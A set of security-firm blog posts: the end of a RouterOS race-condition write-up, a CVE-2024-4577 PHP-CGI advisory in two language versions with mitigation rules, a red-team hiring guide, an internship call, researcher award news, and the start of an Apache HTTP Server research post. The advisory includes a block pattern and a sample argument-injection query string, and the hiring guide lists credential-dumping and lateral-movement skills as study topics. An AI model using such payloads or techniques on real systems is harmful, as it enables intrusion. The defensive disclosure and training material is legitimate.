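resolver sets a timer when it receives the first request. In the IPC mechanism, resolver cannot know how many AddObj requests belong to the same batch, so it simply sets a one-shot timer and sends a single notification when it expires. In addition, each time resolver finishes a create request, it should return a nova message as a response, telling radvd the id of the remote object just added. radvd handles this response with a one-shot ResponseHandler that it registered when sending the request.

But if the second RA packet arrives so quickly that resolver has not yet sent the id back in its response, radvd can only mark the old DNS remote object as destroyed for soft deletion.

radvd then goes on to create a new DNS remote object for the RDNSS field of the second RA packet. Since resolver has not finished its first iteration, this new request stays in the socket until the next iteration.

Back in resolver, the first iteration ends by returning the id to radvd. The ResponseHandler in radvd would update the remote object with the id it received, but because the remote object has already been marked as deleted, the ResponseHandler deletes the object instead of updating its id.

After deleting the remote object kept in radvd, the ResponseHandler sends a delete object message to resolver, telling it that the remote object is no longer in use and should be deleted. This message, too, waits in the socket to be processed.

resolver then enters its second iteration. It first takes from the socket the request created for the second RA and creates the corresponding remote object for that RA’s DNS:

But before the delete request is processed, the timer set earlier expires, so resolver calls nv::Handler::sendChanges to notify all subscribers of the DNS entries it currently knows. Because object 1 has not been deleted yet, resolver pushes out the DNS entries created by both requests.

On receiving this information, radvd immediately builds the RA packet to broadcast on the LAN, with the results of the two requests mixed together. This is why our attack initially succeeded only on macOS. The race condition may sound hard to trigger (it is not triggered if the delete request is processed before the timer fires), but that is only because we simplified the process considerably for the sake of explanation. In practice, the race always succeeds as long as the interval between the two packets is short enough.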

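Summary

Through the analysis above, we found a race condition pattern in the remote object mechanism of RouterOS:

  • A non-blocking method is used to create or delete remote objects
  • The remote objects are subscribed to

With this type of bug, an attacker can mix the results of two requests into a single response, which might serve as a way to bypass certain security checks. If we had found an exploitable vulnerability, we could also have used it to enter the LAN side of the router category in Pwn2Own.

In the end we were pressed for time and did not find an exploitable vulnerability through the race condition. To make matters worse, as the registration deadline approached, we discovered that the exploit we had tested hundreds of times over the past few months had some problems. Three hours before the deadline it kept failing no matter what we tried, as if we were going in circles; it was the witching hour of the digital age. We kept updating the exploit and the vulnerability white paper we were going to submit, and only finished half an hour before the deadline (4:00 AM).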

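Luckily, we completed the attack on our very first attempt during the contest, becoming the first team in Pwn2Own history to complete the new SOHO SMASHUP category:

We earned 10 Master of Pwn points and a prize of $100,000 in this category, and when the contest was tallied, DEVCORE won with 18.5 Master of Pwn points.

In addition to the Master of Pwn title, trophy, and jacket, the winner by tradition also receives one of each device it hacked from the organizers.

(We couldn’t fit everything into the frame)

Conclusion

In this research, we explored RouterOS in depth, uncovered a security vulnerability that had been lurking in RouterOS for nine years, and used it to win the SOHO SMASHUP category at Pwn2Own Toronto 2022. We also found a pattern of behavior in the IPC that leads to race conditions. Finally, we have open sourced the tools used in the contest at https://github.com/terrynini/routeros-tools for your reference.

Through this research and write-up, DEVCORE hopes to share our findings and experience to help white hat hackers gain a deeper understanding of RouterOS and make it more transparent and easier to understand.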

Security Alert: CVE-2024-4577 - PHP CGI Argument Injection Vulnerability

During DEVCORE’s continuous offensive research, our team discovered a remote code execution vulnerability in PHP. Due to the widespread use of the programming language in the web ecosystem and the ease of exploitability, DEVCORE classified its severity as critical, and promptly reported it to the PHP official team. The official team released a patch on 2024/06/06. Please refer to the timeline for disclosure details.

Description

While implementing PHP, the team did not notice the Best-Fit feature of encoding conversion within the Windows operating system. This oversight allows unauthenticated attackers to bypass the previous protection of CVE-2012-1823 by specific character sequences. Arbitrary code can be executed on remote PHP servers through the argument injection attack.

Impact

This vulnerability affects all versions of PHP installed on the Windows operating system. Please refer to the table below for details:

  • PHP 8.3 < 8.3.8
  • PHP 8.2 < 8.2.20
  • PHP 8.1 < 8.1.29

Since the PHP 8.0 branch, PHP 7, and PHP 5 are End-of-Life and no longer maintained, server admins can refer to the Am I Vulnerable section and find temporary patch recommendations in the Mitigation Measure section.

Am I Vulnerable?

For the common combination of Apache HTTP Server and PHP, server administrators can use the two methods listed in this article to determine whether their servers are vulnerable. Note that Scenario 2 is also the default configuration of XAMPP for Windows, so all versions of XAMPP installations on Windows are vulnerable by default.

As of this writing, it has been verified that when Windows is running in the following locales, an unauthorized attacker can directly execute arbitrary code on the remote server:

  • Traditional Chinese (Code Page 950)
  • Simplified Chinese (Code Page 936)
  • Japanese (Code Page 932)

For Windows running in other locales such as English, Korean, and Western European, due to the wide range of PHP usage scenarios, it is currently not possible to completely enumerate and eliminate all potential exploitation scenarios. Therefore, it is recommended that users conduct a comprehensive asset assessment, verify their usage scenarios, and update PHP to the latest version to ensure security.

Scenario 1: Running PHP under CGI mode

When configuring the Action directive to map corresponding HTTP requests to a PHP-CGI executable binary in Apache HTTP Server, this vulnerability can be exploited directly. Common configurations affected include, but are not limited to:

AddHandler cgi-script .php
Action cgi-script "/cgi-bin/php-cgi.exe"

Or

<FilesMatch "\.php$">
SetHandler application/x-httpd-php-cgi
</FilesMatch>
Action application/x-httpd-php-cgi "/php-cgi/php-cgi.exe"

Scenario 2: Exposing the PHP binary (also the default XAMPP configuration)

Even if PHP is not configured under the CGI mode, merely exposing the PHP executable binary in the CGI directory makes the server vulnerable, too. Common scenarios include, but are not limited to:

  1. Copying php.exe or php-cgi.exe to the /cgi-bin/ directory.
  2. Exposing the PHP directory via ScriptAlias directive, such as:
    ScriptAlias /php-cgi/ "C:/xampp/php/"

Mitigation Measure

It is strongly recommended that all users upgrade to the latest PHP versions of 8.3.8, 8.2.20, and 8.1.29. For systems that cannot be upgraded, the following instructions can be used to temporarily mitigate the vulnerability.

However, since PHP CGI is an outdated and problematic architecture, it’s still recommended to evaluate the possibility of migrating to a more secure architecture such as Mod-PHP, FastCGI, or PHP-FPM.

1. For users who cannot upgrade PHP:

The following Rewrite Rules can be used to block attacks. Please note that these rules are only a temporary mitigation for Traditional Chinese, Simplified Chinese, and Japanese locales. It is still recommended to update to a patched version or migrate the architecture in practice.

RewriteEngine On
RewriteCond %{QUERY_STRING} ^%ad [NC]
RewriteRule .? - [F,L]
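To see which requests the condition above would match, the same pattern can be tried against a few raw query strings. This is only a sketch of the regular expression’s behavior: the function name and the sample query strings are made up for illustration, and it does not emulate Apache itself.

```python
import re

# Same pattern as the RewriteCond; [NC] corresponds to case-insensitive matching.
BLOCK_PATTERN = re.compile(r"^%ad", re.IGNORECASE)


def would_be_blocked(raw_query_string: str) -> bool:
    """Return True if the undecoded query string starts with %ad (any case)."""
    return BLOCK_PATTERN.search(raw_query_string) is not None


for query in ["%ADd+allow_url_include%3d1", "%add+foo", "id=1", "page=%ad"]:
    print(query, would_be_blocked(query))
```

The rule only looks at the very start of the query string, which is consistent with the note above that it is a temporary mitigation rather than a full fix.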

2. For users who use XAMPP for Windows:

XAMPP has not yet released corresponding update files for this vulnerability at the time of writing this article. If you confirm that you do not need the PHP CGI feature, you can avoid exposure to the vulnerability by modifying the following Apache HTTP Server configuration:

C:/xampp/apache/conf/extra/httpd-xampp.conf

Locate the corresponding line:

ScriptAlias /php-cgi/ "C:/xampp/php/"

And comment it out:

# ScriptAlias /php-cgi/ "C:/xampp/php/"

Timeline

  • 2024/05/07 - DEVCORE reported this issue through the official PHP vulnerability disclosure page.
  • 2024/05/07 - PHP developers confirmed the vulnerability and emphasized the need for a prompt fix.
  • 2024/05/16 - PHP developers released the first version of the fix and asked for feedback.
  • 2024/05/18 - PHP developers released the second version of the fix and asked for feedback.
  • 2024/05/20 - PHP entered the preparation phase for the new version release.
  • 2024/06/06 - PHP released new versions 8.3.8, 8.2.20, and 8.1.29.

Reference

Security Alert: PHP Remote Code Execution (CVE-2024-4577) - PHP CGI Argument Injection Vulnerability

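During its forward-looking offensive research, the DEVCORE research team discovered a remote code execution vulnerability in the PHP programming language. Given how widely PHP is used across the web ecosystem and how easily the vulnerability can be reproduced, the team rated it critical and reported it to the PHP team immediately. A fixed version was released on 2024/06/06. See the disclosure timeline for details.

Description

When PHP was designed, the Best-Fit feature of character encoding conversion inside the Windows operating system was overlooked. As a result, unauthenticated attackers can bypass the earlier protection for CVE-2012-1823 with specific character sequences and execute arbitrary code on remote PHP servers through attacks such as argument injection.

Impact

This vulnerability affects all versions of PHP installed on the Windows operating system. See the list below for details:

  • PHP 8.3 < 8.3.8
  • PHP 8.2 < 8.2.20
  • PHP 8.1 < 8.1.29

Since the PHP 8.0 branch, PHP 7, and PHP 5 are no longer officially maintained, server administrators can refer to the Am I Vulnerable? section and find temporary mitigations under Mitigation Measure.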

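How do I know if I am vulnerable?

For the common combination of Apache HTTP Server and PHP, website administrators can use the two methods listed in this article to determine whether a server is vulnerable. Note that Scenario 2 is also the default configuration of XAMPP for Windows, so all versions of XAMPP for Windows are vulnerable by default.

At the time of writing, it has been verified that when Windows runs in the following locales, an unauthenticated attacker can directly execute arbitrary code on the remote server:

  • Traditional Chinese (Code Page 950)
  • Simplified Chinese (Code Page 936)
  • Japanese (Code Page 932)

For Windows running in other locales such as English, Korean, and Western European, the wide range of PHP usage scenarios makes it currently impossible to enumerate and rule out every exploitation scenario. Users are therefore still advised to take a full inventory of their assets, verify their usage scenarios, and update PHP to the latest version to be safe.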

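Scenario 1: Running PHP in CGI mode

When the Action directive in the Apache HTTP Server configuration maps the corresponding HTTP requests to the PHP-CGI executable, the server is affected by this vulnerability. Common configurations include, but are not limited to: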

AddHandler cgi-script .php
Action cgi-script "/cgi-bin/php-cgi.exe"

<FilesMatch "\.php$">
SetHandler application/x-httpd-php-cgi
</FilesMatch>
Action application/x-httpd-php-cgi "/php-cgi/php-cgi.exe"

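Scenario 2: Exposing the PHP binary (also the default XAMPP configuration)

Even if PHP is not configured to run in CGI mode, merely exposing the PHP executable in a CGI directory is enough to be affected by this vulnerability. Common cases include, but are not limited to:

  1. Copying php.exe or php-cgi.exe to the /cgi-bin/ directory.
  2. Exposing the PHP installation directory through the ScriptAlias directive, for example: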
     ScriptAlias /php-cgi/ "C:/xampp/php/"

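Mitigation Measures

It is strongly recommended that all users upgrade to the latest official PHP versions 8.3.8, 8.2.20, and 8.1.29. Systems that cannot be upgraded can use the methods below to temporarily mitigate the vulnerability.

In addition, because PHP CGI is an outdated and problem-prone architecture, it is also recommended to evaluate migrating to a more secure architecture such as Mod-PHP, FastCGI, or PHP-FPM.

1. For users who cannot upgrade PHP:

The following Rewrite rules can be used to block attacks. Note that these rules are only a temporary mitigation for the Traditional Chinese, Simplified Chinese, and Japanese locales. In practice, it is still recommended to update to a patched version or change the architecture.

RewriteEngine On
RewriteCond %{QUERY_STRING} ^%ad [NC]
RewriteRule .? - [F,L]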

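2. For users who use XAMPP for Windows:

At the time of writing, XAMPP has not yet released an updated installer for this vulnerability. If you have confirmed that your XAMPP installation does not use the PHP CGI feature, you can avoid exposure by modifying the following Apache HTTP Server configuration file:

C:/xampp/apache/conf/extra/httpd-xampp.conf

Locate the corresponding line:

ScriptAlias /php-cgi/ "C:/xampp/php/"

And comment it out:

# ScriptAlias /php-cgi/ "C:/xampp/php/"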

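Timeline

  • 2024/05/07 - DEVCORE reported this issue through the official PHP vulnerability disclosure page.
  • 2024/05/07 - PHP developers confirmed the vulnerability and emphasized the need for a prompt fix.
  • 2024/05/16 - PHP developers released the first version of the fix and asked for feedback.
  • 2024/05/18 - PHP developers released the second version of the fix and asked for feedback.
  • 2024/05/20 - PHP entered the preparation phase for the new version release.
  • 2024/06/06 - PHP released new versions 8.3.8, 8.2.20, and 8.1.29.

Reference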

A Guide to Applying as a Red Team Specialist


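Red teaming is DEVCORE's core business. We have extensive hands-on experience and have brought together a group of excellent colleagues to take on challenges together. Many technology enthusiasts hope to join us and want to know what we look for when hiring. With graduation season and the job hunt under way, we prepared this application guide to help interested people know what to prepare, and to help recent graduates who are not good at writing résumés or presenting themselves in interviews fill in the necessary skills so they do not miss an opportunity. Whether you are interested in the Red Team Specialist or the Penetration Tester role, we hope this guide helps you become one of us.

By the way, here is something current students may find interesting: DEVCORE has R&D substitute military service openings, but the number is limited. We recommend submitting your résumé early while you are still in school and asking about substitute service availability.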

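🚀 The DEVCORE Application Process

Applicants for both Red Team Specialist and Penetration Tester go through three stages: document review, an online test, and an interview.

📌 Document Review

The résumé is the main basis for evaluation at this stage. Here are 4 points we think applicants should pay attention to:

Does your résumé match the job requirements?

The most important thing at this stage is to convince the reviewer that you have the abilities the job requires, so include as much supporting evidence as you can to help others judge. In the past, some students with solid technical foundations listed only their education, which made it hard for the reviewer to find any reason to move them to the next stage. That was a real pity.

Use concrete examples

Concrete examples are the key to making your résumé stand out. Specific numbers and facts greatly increase its persuasiveness, for example how many penetration tests you have performed, how many vulnerabilities you found along the way, or what problems you solved during an engagement and with what result. These show not only technical ability but also your impact.

Provide helpful additional information

Additional information such as relevant professional certifications, participation in technical communities, and contributions to open-source projects helps the reviewer evaluate you. Some people wonder whether non-technical experience belongs on the résumé. By default we do not give it particular weight, but if you believe it will have a positive effect on your future work, include it and let the reviewer decide.

Bonus items we especially want to see

Below are some bonus items that are not required but are great to have. If you have experience in these areas, be sure to write it down. We also list the traits we value in each item; if you have other experience that demonstrates these traits, feel free to list it as well.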

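📄 Real-world experience such as CVEs and bug bounties
  • Shows that you can solve unknown problems.
  • Shows that you can see details others have overlooked.
📄 CTF writeups or a blog
  • Good results in CTF competitions usually mean that you can analyze and distill the key points in a short time and find solutions quickly, and that your associative thinking and creativity are probably good as well.
  • We want to see how you describe complex vulnerabilities, because future work requires describing the exploitation process clearly and giving recommendations.
  • Besides demonstrating communication and writing skills, blogging usually reflects a passion for continuous learning and a willingness to share, which matches DEVCORE's core values.
📄 Experience creating CTF challenges
  • Shows that you keep up with popular technologies, study the characteristics of languages and frameworks, and notice small details that few people know about.
  • Shows that, beyond attacking, you also have a certain level of development ability.
  • Because challenges must be protected from sabotage by CTF players, challenge authors usually have strong defensive skills as well.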

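📌 Online Test

This stage works the same way as common online lab environments such as OSCP and HTB. You will be assigned a set of challenges and need to capture five flags on average. Applicants get ample time to solve them (10 days by default, adjusted slightly depending on the challenges) and submit a report at the end. We expect the online test to show that the applicant has the following abilities:

  • Reconnaissance: whether you can reasonably infer the underlying architecture or implementation from the information available.
  • Vulnerability discovery: whether you can find the vulnerabilities designed into the challenges.
  • Adaptability: whether you can overcome an unusual environment on your own. For example, in an environment where you only have command injection and the internal network is restricted by a firewall, how do you reach your goal with the resources at hand?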

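📌 Interview

The final interview stage evaluates comprehensively whether you are a good fit for the position. There are 2 things we particularly want to share with applicants:

Being stumped is normal

During the interview, the interviewers will probe the breadth and depth of your technical skills from multiple angles, so being stumped is normal. Have confidence in your technical ability; after all, you have already passed the second-stage online test. When asked something unfamiliar, just express your thought process and problem-solving approach honestly. We want to understand your line of thinking, and we even hope to hear you say: "I saw feature XX and think this might be solved in direction OO; I would search for the answer with such-and-such keywords." An answer like this also highlights your judgment and problem-solving ability.

Share your hack stories

We look forward to hearing about your memorable hacking experiences in the interview and discussing the details with you. Any kind of hack is welcome, for example:

  • CVEs or bug bounties mentioned in your résumé
    • Ideally these involve unusual circumstances. If what you found is a common vulnerability such as SQLi or XSS, we would like to know what makes it special, or what you did and why you were able to find it.
  • An ingenious solution you came up with in a CTF competition
  • Hacks you did in everyday life to reach a goal
    • For example: writing a small tool to automate a workflow, wiring up a handy notification system for rental listings, or automating a game's daily reward claims.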

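🚀 The Path of Self-Training

This section is for students who are still preparing and want to join the security assessment industry in the future. To build up your skills before applying, consider the following areas for improvement, which also help with long-term growth in the security field.

📌 Fill in the Fundamentals

Common web vulnerability classes

We consider the vulnerabilities compiled by PortSwigger Web Security Academy to be classic and complete, and with labs available for direct practice, it suits beginners. These vulnerabilities are the most basic shared language of security assessment. We recommend practicing every vulnerability on the learning materials page; browsing the topics page makes the categories clearer. If your goal is red teaming, we prioritize back-end vulnerabilities that can yield a shell. Here are some items for self-assessment and improvement:

  • Pick any vulnerability: can you say which features it commonly occurs in, what its root cause is, and how it can usually be exploited further?
  • Can you identify these vulnerabilities through testing in a black-box setting?
  • In a white-box setting, do you know which functions to search for to find each vulnerability?
  • In interviews we like to ask how various vulnerabilities can lead to a shell, because that is the first step toward a red team engagement's objective. Searching for keywords like "from XSS to RCE" turns up plenty of cases (XSS can be replaced with SQLi and other vulnerabilities).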

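Red team tactics and techniques

After taking control of a machine, you still need to spread through the internal network to complete the mission. ired.team provides a handbook of red team techniques, and we recommend reading it to learn which moves are available at each stage. At DEVCORE, we prioritize the skills under the "Active Directory & Kerberos Abuse", "Credential Access & Dumping", and "Lateral Movement" chapters. The concepts and techniques of "Network pivoting & tunneling" are also abilities we care about; ired.team covers this area only lightly, and this article covers the necessary knowledge and tools for reference. Learn with the end in mind: after practicing these techniques and tools, we hope you will have your own views on the questions below.

Suppose you have compromised one of an enterprise's internet-facing services and your target is the domain controller on its internal network (you may assume the scenario architecture yourself):

  • To attack AD, what would you do on the compromised internet-facing server, and why? Which tools do you prefer along the way, and why?
  • Continuing from above, if this server has a domain account, what would you do next? What if it does not?
  • To take over the domain controller, can five or more methods immediately come to mind? Which would you try first, and why?
  • Which tools do you prefer for lateral movement along the way, and why?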

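📌 Practice

Virtual lab practice

Besides knowledge, you also need simulated environments to develop a feel for the work. The well-known Hack The Box and OffSec both offer learning paths and a rich set of lab machines:

Just pick the platform that suits you. You can also simply work through HTB Labs machines until what you do for each one feels similar and the challenges start to feel formulaic; there is no need to dwell on unusual solutions at this stage. Interns who played HTB in the past attached writeups covering roughly 30 to 50 machines before being accepted, and that order of magnitude may serve as a reference. If you want to practice attacking a domain, the GOAD LAB project on GitHub is well worth a look.

If you want to pursue certifications, these are the ones we have taken and found helpful for improving assessment skills:

Note: only certifications known to be helpful are listed above; this does not mean other certifications are unhelpful.

Real-world practice

What we recommend most is to go out into the real world.

  • White-box practice: pick a GitHub project you know or like, look at its past vulnerabilities, and see whether you could have tracked them down yourself by reading the code. If you can find these vulnerabilities with known answers, move on to hunting 0-days in open-source projects.
  • Black-box practice: join bug bounty programs and take on real-world security problems. For programs from Taiwanese companies, see HITCON ZeroDay; internationally, we recommend the targets on HackerOne. These programs expose you to more complex and diverse attack scenarios and improve your practical skills.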

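📌 Find Companions

On the security path, finding like-minded partners to learn, play CTFs, and hunt vulnerabilities with is definitely more efficient than leveling up alone. Consider taking part in the following:

  • HITCON Community: almost every security community gathers at this conference, where you can find one that suits you.
  • AIS3: brings together almost all students in Taiwan who are interested in security. There is a good chance of meeting like-minded friends here.
  • 台灣好厲駭 Deep Hacking study group: one of the deepest and most rigorous security study groups in Taiwan. Attending will broaden your horizons and introduce you to all kinds of experts. The content leans toward binary but is gradually changing, with the hope of focusing on vulnerability discovery regardless of category.
  • DEVCORE Internship Program: recruits every mid-January and mid-July. If your goal is to apply to DEVCORE, joining the program and asking your mentor is probably the fastest route.

If you want more resources, the collection in 台灣資安 / CTF 學習資源整理 is worth a look.

🚀 Summary

This guide has two parts. The first half offers applicants a few reminders, in the hope that they can present their best side. The second half lays out a learning path to give those still learning a clearer direction.

Ultimately, we hope more and more people in Taiwan who love technology will join the security industry, and we hope to keep seeing you, the reader, in the security field.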


DEVCORE 2024 Sixth Internship Program


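DEVCORE was founded more than ten years ago and has remained focused on providing proactive security services, dedicated to finding security risks and vulnerabilities to make the world safer. To keep finding new security talent who share our ideals and to help students build sound security awareness and skills, we established the 戴夫寇爾全國資訊安全獎學金 (DEVCORE National Information Security Scholarship) and launched our first internship program in early 2022. The results so far have been fruitful and beyond expectations, and the fifth internship program will wrap up at the end of July this year. We are honored to announce that the sixth internship program is coming soon. If you would like to join us and sharpen your security skills, please read the information below carefully and apply by email!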

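Internship Content

This internship is divided into two groups, Research and Red Team. The main content is as follows:

  • Research (Binary/Web): research-focused. After settling on a research target with your mentor, you analyze the target's architecture and perform reverse engineering or code review. This process trains your thinking and helps you find possible attack surfaces and potential weaknesses. You will also try analyzing past vulnerabilities and writing exploits for them, to understand where past vulnerabilities appeared and experience how real-world vulnerabilities are exploited.
    • Vulnerability discovery and research 60 %
    • 1-day development (Exploitation) 30 %
    • Results report and preparation 10 %
  • Red Team: study and learn in depth the techniques red teams commonly use, and become familiar with the scenarios, languages, and architectures encountered in real engagements. Understand the root causes of common vulnerabilities, practical exploitation methods, exploitation strategies under harsh constraints, black-box testing approaches, and all sorts of clever tricks. Learn the common restrictions encountered during post-exploitation and the concepts and principles behind the tools.
    • Research and in-depth study of vulnerabilities and techniques 70 %
    • Lab building, bug bounty, or vulnerability discovery 30 %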

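Office Location

13F, No. 32, Sec. 3, Bade Rd., Songshan Dist., Taipei City

Internship Period

  • From September 2024 to the end of January 2025, 5 months in total.
  • Two working days per week, with working hours of 10:00 – 18:00
    • One fixed afternoon each week, 14:00 - 18:00, must be spent at the office to discuss progress
      • If you live outside Taipei and New Taipei, this can be adjusted flexibly (but must be consistent within each group)
    • All remaining time is remote work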

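Who Can Apply

  • Students with a certain level of security background who can work two days per week
  • There are no other restrictions, and former interns may apply again
  • If you have any doubts about eligibility, feel free to email us

Expected Number of Openings

  • Research group: 2~3 people
  • Red Team group: 2~3 people

Compensation

NT$16,000 per month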

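Requirements and Application Process

Internship Requirements

Research (Binary/Web)

  • Basic vulnerability exploitation and discovery skills
  • Enthusiasm for research and a habit of understanding the essence of a technology
  • Familiarity with any scripting language (e.g., Shell Script, Python, Ruby) and the ability to use scripts to support research
  • Debugging skills: able to make good use of a debugger to trace program flow, and to reproduce and narrow down problems
  • Ability to analyze open-source projects independently and understand a target project's architecture by reading its code
  • Familiarity with and understanding of the causes of common vulnerabilities
    • OWASP Web Top 10
    • Memory Corruption
    • Race Condition
  • Nice to have, but not required
    • CTF competition experience
    • pwnable.tw results
    • Public technical blog posts, slides, write-ups, or talks
    • Proficiency in IDA Pro or Ghidra
    • Familiarity with any web programming language or framework (e.g., PHP, ASP.NET, Express.js) and the ability to build a complete web service
    • Understanding of the security topics in PortSwigger Web Security Academy
    • Experience independently discovering 0-day vulnerabilities or analyzing 1-days
    • Experience in at least one of the following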
      • Web Application Exploit
      • Kernel Exploit
      • Windows Exploit
      • Browser Exploit
      • Bug Bounty

Red Team

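  • Familiarity with OWASP Web Top 10
  • Understanding of all the security topics in PortSwigger Web Security Academy, or completion of all its labs
  • Understanding of basic computer networking concepts
  • Familiarity with any web development stack (e.g., PHP, ASP.NET, JSP) and the ability to build a complete web service
  • Familiarity with any scripting language (e.g., Shell Script, Python, Ruby) and the ability to use scripts to support research
  • Debugging skills: able to make good use of a debugger to trace program flow, and to reproduce and narrow down problems
  • Ability to set up and configure common web servers (e.g., Nginx, Apache, Tomcat, IIS) and operating systems (e.g., Linux, Windows)
  • Nice to have, but not required
    • Have independently discovered a 0-day vulnerability
    • Have independently analyzed a known vulnerability and written a 1-day exploit
    • Have served as a challenge author in a CTF competition and built the challenges
    • Hold an OSCP certification or one demonstrating equivalent ability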

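Application Process

The selection consists of two stages:

Stage 1: Document Review

Stage 1 is a document review covering the following two items:

  • Résumé
  • Short-answer responses
    • Applying as a Research intern:
      • Question 1: Vulnerability reproduction and analysis process
        • Present one real vulnerability or attack chain, published between 2022 and 2024, that impressed you most or that you found interesting. Explain in detail, in your own understanding, its root cause, the conditions for exploitation, and the impact it can have. Also try to describe how to reproduce the vulnerability or attack chain; even if you cannot reproduce it successfully, please document your research process. Refer to the template when writing the report and be as detailed as possible. Either Chinese or English is fine.
      • Question 2: Topics you want to research during the internship
        • Propose three specific topics you might choose, and briefly explain your reasons or what you want to accomplish, for example:
          • Research ◯◯ open-source software and find a critical vulnerability that allows RCE.
          • Research common routers; targets include the AA-123 router and the BB-456 wireless router.
          • Research common note-taking platforms or software; targets include XX Note and YY Note.
    • Applying as a Red Team intern:
      • Present two talks, published between 2022 and 2024, related to web attack surfaces, vulnerabilities, or attack chains. Explain why you chose them and why they are interesting. Explain the details of these talks in your own words, and provide any additional material that you think supports or demonstrates your understanding. The talks may come from conferences including, but not limited to, Black Hat, DEF CON, OffensiveCon, POC, ZeroConf, Hexacon, HITCON, and TROOPERS CONFERENCE.

The submission deadline for this stage is 2024/08/09 23:59. We will decide whether you pass Stage 1 based on your résumé and your answers, and will reply within 10 working days.

Stage 2: Interview

This stage is a 30 to 120 minute interview (depending on the group's needs; you will be notified separately) with 2~3 senior colleagues, who will assess whether you have the technical ability and personal qualities this internship requires.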

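Timeline

  • 2024/07/18 - 2024/08/09 Open recruitment
  • 2024/08/12 - 2024/08/22 Interviews
  • Results sent by 2024/08/26
  • 2024/09/02 The sixth internship program begins that week

How to Apply

  • Send your résumé and your answers in PDF format to recruiting_intern@devco.re
    • For the résumé format, refer to the sample (DOCX, PAGES, PDF) and convert it to PDF. If you are confident, feel free to design a résumé that best showcases your abilities.
    • Send it before 2024/08/09 23:59 (recruitment may close early if all openings are filled)
  • Email subject format: [應徵] Position Your Name (example: [應徵] Red Team 組實習生 王小美)
  • Keep your résumé within three pages and include at least the following:
    • Basic information
    • Education
    • Internship experience
    • Community activity experience
    • Notable achievements
    • Past security-related research
    • MBTI personality test result (test page)

For any questions about applying, please contact us by email only. We apologize for any inconvenience. Thank you for writing, and we look forward to having you join us!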

MSRC 2024 Most Valuable Security Researchers - Angelboy


We’re thrilled to announce that Angelboy, senior security researcher at DEVCORE, has been named one of Microsoft’s MSRC 2024 Most Valuable Security Researchers! He not only secured the #33 spot on the overall list but also achieved the #9 position in the Windows category.

This is the first time Angelboy has been shortlisted on this annual leaderboard, and he is also the highest-ranked Taiwanese security researcher featured. This prestigious accomplishment highlights his exceptional expertise and significant contributions to the field.

The Microsoft Security Response Center (MSRC) has long recognized the efforts of security researchers who partner with Microsoft in reporting vulnerabilities through its Microsoft Researcher Recognition Program (MRRR). The program expresses gratitude for their contributions to the security of Microsoft’s global customers and products.

The MSRC 2024 Most Valuable Security Researchers list, announced on August 7th, is based on the total number of points the researchers earned for each valid report from July 2023 to June 2024. Angelboy secured the #33 spot on the leaderboard. Specifically, his dedicated passion for Windows Kernel research earned him a #9 ranking in the Windows category, placing him in the TOP 10. He was also awarded “Accuracy” and “Volume” badges, further highlighting his significant contributions to vulnerability research.

References:

Angelboy Named to Microsoft's MSRC 2024 Top 100 Most Valuable Security Researchers!


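Congratulations to Angelboy, senior security researcher at DEVCORE, on being named one of Microsoft's MSRC 2024 Most Valuable Security Researchers! Besides ranking #33 on the overall TOP 100 list, he placed #9 in the Windows category, an area he has researched for years, putting him in the top ten.

This is the first time Angelboy has appeared on the annual list, and he is also the highest-ranked Taiwanese security researcher on it.

The Microsoft Security Response Center (MSRC) has long used the Microsoft Researcher Recognition Program (MRRR) to publicly recognize security researchers who help Microsoft find security vulnerabilities, as thanks for their efforts toward the security of Microsoft's customers and products.

The MSRC 2024 Most Valuable Security Researchers list, announced by Microsoft on the 7th, is compiled from the points earned for vulnerabilities reported to MSRC by security researchers worldwide from July 2023 to June 2024. On the overall list, Angelboy ranked #33. In the Windows category, among Microsoft's product categories, he made the TOP 10 with a #9 ranking, and all of his vulnerability reports were certified as valid.

Congratulations once again to Angelboy on this honor!

References: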

Confusion Attacks: Exploiting Hidden Semantic Ambiguity in Apache HTTP Server!

Orange Tsai (@orange_8361)  |  繁體中文版本 |  English Version

Hey there! This is my research on Apache HTTP Server presented at Black Hat USA 2024. Additionally, this research will also be presented at HITCON and OrangeCon. If you’re interested in getting a preview, you can check the slides here:

Confusion Attacks: Exploiting Hidden Semantic Ambiguity in Apache HTTP Server!

Also, I would like to thank Akamai for their friendly outreach! They released mitigation measures immediately after this research was published (details can be found on Akamai’s blog).


TL;DR

This article explores architectural issues within the Apache HTTP Server, highlighting several technical debts within Httpd, including 3 types of Confusion Attacks, 9 new vulnerabilities, 20 exploitation techniques, and over 30 case studies. The content includes, but is not limited to:

  1. How a single ? can bypass Httpd’s built-in access control and authentication.
  2. How unsafe RewriteRules can escape the Web Root and access the entire filesystem.
  3. How to leverage a piece of code from 1996 to transform an XSS into RCE.


Outline


Before the Story

This section is just some personal murmurs. If you’re only interested in the technical details, jump straight to — How Did the Story Begin?

As a researcher, perhaps the greatest joy is seeing your work recognized and understood by peers. Therefore, after completing a significant research with fruitful results, it is natural to want the world to see it — which is why I’ve presented multiple times at Black Hat USA and DEFCON. As you might know, since 2022, I have been unable to obtain a valid travel authorization to enter the U.S. (For Taiwan, travel authorization under the Visa Waiver Program can typically be obtained online within minutes to hours), leading me to miss the in-person talk at Black Hat USA 2022. Even a solo trip to Machu Picchu and Easter Island in 2023 couldn’t transit through the U.S. :(

To address this situation, I started preparing for a B1/B2 visa in January this year: writing various documents, interviewing at the embassy, and waiting endlessly. It’s not fun. But to have my work seen, I still spent a lot of time pursuing every possibility. Even three weeks before the conference, it was unclear whether my talk would be canceled (BH only accepted in-person talks, but thanks to the RB, it could ultimately be presented in pre-recorded format). So, everything you see, including slides, videos, and this blog, was completed within just a few dozen days. 😖

As a pure researcher with a clear conscience, my attitude towards vulnerabilities has always been — they should be directly reported to and fixed by the vendor. Writing these words isn’t for any particular reason, just to record some feelings of helplessness, efforts in this year, and to thank those who have helped me this year, thank you all :)


How Did the Story Begin?

Around the beginning of this year, I started thinking about my next research target. As you might know, I always aim to challenge big targets that can impact the entire internet, so I began searching for some complex topics or interesting open-source projects like Nginx, PHP, or even delved into RFCs to strengthen my understanding of protocol details.

While most attempts ended in failure (though a few might become topics for future blog posts 😉), reading this code reminded me of a quick review I had done of Apache HTTP Server last year! Although I didn’t dive deep into the code because of my work schedule, I had already “smelled” something not quite right about its coding style at that time.

So this year, I decided to continue on that research, transforming the “bad smells” from an indescribable “feeling” into concrete research on Apache HTTP Server!


Why Apache HTTP Server Smells Bad?

Firstly, the Apache HTTP Server is a world constructed by “modules,” as proudly declared in its official documentation regarding its modularity:

Apache httpd has always accommodated a wide variety of environments through its modular design. […] Apache HTTP Server 2.0 extends this modular design to the most basic functions of a web server.

The entire Httpd service relies on hundreds of small modules working together to handle a client’s HTTP request. Among the 136 modules listed by the official documentation, about half are either enabled by default or frequently used by websites!

